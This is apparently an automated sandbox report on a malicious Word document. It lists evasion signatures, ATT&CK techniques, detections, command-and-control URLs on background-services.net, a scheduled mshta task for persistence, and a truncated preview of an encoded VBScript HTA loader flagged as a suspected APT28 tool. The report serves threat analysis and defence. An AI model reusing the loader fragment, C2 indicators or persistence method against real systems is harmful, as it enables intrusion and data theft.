Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function rundoc, API Open("C:\Users\user\AppData\Local\Temp\Rev5_ Joint Declaration C5 GER_track changes.doc.doc")Name: rundoc
Source: Rev5_ Joint Declaration C5 GER_track changes.docStream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, found possibly 'ActiveDocument.Name' functions activedocument.nameName: documeNt_opEn
Source: ~WRD0000.tmp.0.drStream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW =
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting		Valid Accounts3
Exploitation for Client Execution		42
Scripting		1
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS4
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Rev5_ Joint Declaration C5 GER_track changes.doc34%ReversingLabsScript-WScript.Trojan.MacrosBomber
Rev5_ Joint Declaration C5 GER_track changes.doc43%VirustotalBrowse
Rev5_ Joint Declaration C5 GER_track changes.doc100%AviraVBA/AVI.Obfuscated.hgyul

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~WRD0001.tmp100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://background-services.net/local.phpn0%Avira URL Cloudsafe
http://background-services.net/local.phpvices.net/local.php0%Avira URL Cloudsafe
http://background-services.net/local.phpvices.net/local.phpder0%Avira URL Cloudsafe
http://background-services.net/local.phpiP0%Avira URL Cloudsafe
https://loki.officenet.eaglex.ic.gov0%Avira URL Cloudsafe
http://background-services.net/local.phpj.s0%Avira URL Cloudsafe
http://background-services.net/local.phpndows0%Avira URL Cloudsafe
http://background-services.net/local.phpet00%Avira URL Cloudsafe
http://background-services.netttings0%Avira URL Cloudsafe
https://loki.delve.office.de0%Avira URL Cloudsafe
http://background-services.netE020%Avira URL Cloudsafe
http://background-services.net/local.phpTime0%Avira URL Cloudsafe
http://background-services.net/local.phpvices.net/local.phpf.O0%Avira URL Cloudsafe
http://background-services.net/setup.php0%Avira URL Cloudsafe
https://loki.officenet.microsoft.scloud0%Avira URL Cloudsafe
http://background-services.net/local.php~0%Avira URL Cloudsafe
https://react-native-community.github.io/async-storage/docs/advanced/jest0%Avira URL Cloudsafe
http://background-services.net/local.php2P0%Avira URL Cloudsafe
http://background-services.net/local.phplate0%Avira URL Cloudsafe
http://background-services.net0%Avira URL Cloudsafe
http://background-services.net/local.phpB0%Avira URL Cloudsafe
http://background-services.net/local.php.Foundation.Diagnostics.AsyncCausalityTracertPr0%Avira URL Cloudsafe
http://background-services.net/setup.phpOh0%Avira URL Cloudsafe
http://background-services.net/local.phpP.y0%Avira URL Cloudsafe
http://background-services.net/local.phpWh0%Avira URL Cloudsafe
http://background-services.net/local.php0%Avira URL Cloudsafe
http://background-services.net/setup.phpIi0%Avira URL Cloudsafe
http://background-services.net/setup.php?i0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
background-services.net
2.58.15.158
truetrue
    		unknown
    edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    		217.20.57.18
    		truefalse
      		high
      171.39.242.20.in-addr.arpa
      		unknown
      		unknownfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://gcc.loki.delve.office.comprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
          		high
          http://background-services.net/local.phpiPmshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://background-services.net/local.phpet0mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://background-services.netttingsmshta.exe, 00000009.00000002.2964085366.0000023081CD0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://background-services.net/local.phpj.smshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://background-services.net/local.phpndowsmshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://background-services.net/local.phpnmshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://gcchigh.loki.office365.usprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
            		high
            https://df.loki.delve.office.comprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
              		high
              https://loki.officenet.eaglex.ic.govprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://background-services.net/local.phpvices.net/local.phpmshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://loki.delve.office.deprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://background-services.net/local.phpvices.net/local.phpdermshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://loki.officenet.microsoft.scloudprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://background-services.net/local.phpTimemshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://background-services.netE02mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://background-services.net/local.phpvices.net/local.phpf.Omshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://msit.loki.delve.office.comprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                		high
                http://background-services.net/local.php2Pmshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://background-services.net/local.php~mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://dod.loki.office365.usprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                  		high
                  http://background-services.net/local.phplatemshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/setup.phpmshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://react-native-community.github.io/async-storage/docs/advanced/jestprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.netmshta.exe, 00000009.00000003.1745355594.000002308190B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2965303369.00000230D8B89000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/local.phpBmshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/local.php.Foundation.Diagnostics.AsyncCausalityTracertPrmshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/setup.phpOhmshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/local.phpWhmshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://background-services.net/setup.phpIimshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/react-native-community/react-native-async-storage/issuesprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                    		high
                    http://background-services.net/local.phpmshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://background-services.net/local.phpP.ymshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://background-services.net/setup.php?imshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://loki.delve.office.comprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                      		high
                      https://loki.office365.cnprep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.drfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        2.58.15.158
                        		background-services.netCzech Republic
                        		33438HIGHWINDS2UStrue

                        Private

                        IP
                        192.168.2.26

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1590268
                        Start date and time:2025-01-13 21:32:10 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                        Run name:Potential for more IOCs and behavior
                        Number of analysed new started processes analysed:21
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Rev5_ Joint Declaration C5 GER_track changes.doc
                        Detection:MAL
                        Classification:mal92.expl.evad.winDOC@5/14@2/2
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 217.20.57.18, 52.109.76.240, 52.109.76.144, 52.113.194.132, 95.100.110.74, 95.100.110.77, 20.189.173.2, 184.28.64.47, 2.20.245.216, 2.20.245.225, 52.109.89.19, 20.42.65.90, 52.109.32.47, 52.109.32.39, 52.109.32.46, 52.109.32.38, 20.109.210.53, 40.126.32.134, 20.242.39.171, 4.245.163.56, 40.126.32.140
                        • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, onedscolprdeus14.eastus.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, wu-b-net.trafficmanager.net, res-1-tls.cdn.office.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageedi
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        15:33:50API Interceptor861x Sleep call for process: mshta.exe modified
                        21:33:48Task SchedulerRun new task: ServiceDispatch path: C:\Windows\System32\mshta.exe s>C:\Users\user\AppData\Local\Settings\locale

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
                        • 217.20.57.35
                        JUbmpeT.exeGet hashmaliciousVidarBrowse
                        • 217.20.57.18
                        DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                        • 217.20.57.20
                        DOCS974i7C63.pdfGet hashmaliciousHTMLPhisherBrowse
                        • 217.20.57.18
                        https://support.wt-nx.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                        • 84.201.210.39
                        https://support.rv-rw.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                        • 217.20.57.19
                        https://findmy.cl-ew.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                        • 217.20.57.18
                        https://www.support.av-ro.com/aU3V88/c1.phpGet hashmaliciousUnknownBrowse
                        • 217.20.57.35
                        https://informed.deliveryekg.top/us/Get hashmaliciousHTMLPhisherBrowse
                        • 217.20.57.34
                        https://informed.deliveryewo.top/us/Get hashmaliciousUnknownBrowse
                        • 217.20.57.19

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        HIGHWINDS2USloligang.sh4.elfGet hashmaliciousMiraiBrowse
                        • 209.197.23.2
                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        • 176.67.82.212
                        botx.mpsl.elfGet hashmaliciousMiraiBrowse
                        • 173.195.114.108
                        nabarm.elfGet hashmaliciousUnknownBrowse
                        • 151.139.27.176
                        sora.arm.elfGet hashmaliciousMiraiBrowse
                        • 74.209.136.78
                        DSCI5829.jpgGet hashmaliciousUnknownBrowse
                        • 173.195.9.145
                        na.elfGet hashmaliciousUnknownBrowse
                        • 5.180.220.137
                        f9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                        • 5.180.220.168
                        SecuriteInfo.com.Win32.CoinminerX-gen.22200.11178.exeGet hashmaliciousXenoRATBrowse
                        • 176.67.83.30
                        0bNqwLK242.elfGet hashmaliciousMiraiBrowse
                        • 74.209.136.48

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        6a5d235ee78c6aede6a61448b4e9ff1eYYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        2M and OPS Cobot White Paper 01082025 TM CH (1).docxGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        Setup.exeGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        https://form.fillout.com/t/emEtLm993dusGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        https://www.tremendous.com/email/activate/yE_yBdRtyVv4Xqgg7hu_Get hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.comGet hashmaliciousUnknownBrowse
                        • 40.115.3.253
                        https://versyasist.website/sism.mp3Get hashmaliciousHTMLPhisherBrowse
                        • 40.115.3.253

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Settings\locale

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):3402
                        Entropy (8bit):5.599930323764607
                        Encrypted:false
                        SSDEEP:48:dwm4wQ97qgOtXFYQqHyyzpE3bM0B04SAmRE7SahsOpjRCZ7/M67Sg1I0qC:WwQ9E2QE43YINF3psOl8Z/5P1I0qC
                        MD5:88F2752BD67FA632DF940B52E38254BD
                        SHA1:5E671630EACC842379EF09DCF57571E4CEED9574
                        SHA-256:3EB696345C147D924A0407E37143C44E8BE3563EFA23EEC914E6C9ACEE3F2BEB
                        SHA-512:7DDEBC720824F03E7693EFF42E7D1FED5C2FF6DC28F9A39E87123A56474649C1E9FE07FF2FCC1CEC10614546BD2EFC3A725D3A086100B0D451F6D0078E344EF2
                        Malicious:false
                        Yara Hits:
                        • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: C:\Users\user\AppData\Local\Settings\locale, Author: Sekoia.io
                        Reputation:low
                        Preview:<HEAD><HTA:APPLICATION ID="setuptools" APPLICATIONNAME="setuptools" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no" BORDER="none" SINGLEINSTANCE="yes"></HEAD><span id=codeblock>load</span><script Language="VBScript.Encode" defer>..#@~^EwwAAA==6.P3MDKDP"+k;:.PH+XY@#@&Skx9GhcD+kr"+:W,!S!@#@&SkUNKARsW-n:WPR+Z!T~ +Z!T@#@&wEx1YbGx,Yn:a`4b@#@&r.~2MDWM~]+kEs+~1naD@#@&dGr:,lSr@#@&doGMPrP{~8PPKPd+xvt*@#@&il~',l~',ZtMcJLCJ,'~HbNvtSkS+*#@#@&irP{Pr~3PF@#@&i1n6D@#@&dO.:aP',l@#@&2.N~s!x^ObWx@#@&Y.6Y,x~Y.:a`EF3q;F.!zXA8c+oy F3T8cXvw{A&T8,ZFc8&OX&8&{A2*+X+FF2qA8&F+qfcO!O&3F*qA*X zq 2*q+Z!*q+z!)G~*; /Z,8 &lF~T%Z,q*WGq32*!WTclZ zq+FwFyF3cTXl&3Fl+AZGT$lAF3T;*)*~*F&*2Z2ZFA!lq,2ZXGy*T+8vcZfGlAFzfXcG W*9F9TWF$!RT&yA+X22F+XGFq!;Xz flsl*!ZG8qfFA*Z8Fqfl*FlqA8ZFlTfcFG8GT*XqOcX&~* +AX0W,*.fO*{FG+8FqZ%WGFA!GXG8*T 8*f)2,FWqcW v8X/&W!2c*&1Xyc{Fy+FZvqXWvF{TG*)*~*FcXy&2AF+Fz* y!Xc2bq.ZsF+X*22!Ffq!+Fl**F{Tw!1Fl*Glb./F !3qG*X OXO&/ZcZf*Z ~qvFA*Z8!TflcFFTZZf!yTfF8v;v9*{X2cT

                        C:\Users\user\AppData\Local\Temp\1E255ADE.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):828
                        Entropy (8bit):2.723114510712629
                        Encrypted:false
                        SSDEEP:24:BrIZMjr0quyFLdpeXKzz7tyYyPjJxpu620:9VjYqugdpeXRYyPjJxpu65
                        MD5:9149D59AC34E3FDF0EC8DC94EB76EDAB
                        SHA1:2BBF45FE0E79A9EDF738C99BCA893E87BD0883CE
                        SHA-256:DA1E9E1A7900C46DEDE8D82BFDF0FB2677890C9E5AB272F1DE5270D7077EEA78
                        SHA-512:C9548C9FE0B74613E9B99033937D68E4D9AC46806C24B1ED5C02A2529E2B2AE5CFE85752E6AB86899088CC0972A092E98A82EB5AE4D30AD39B5E452EF7CE637A
                        Malicious:false
                        Reputation:low
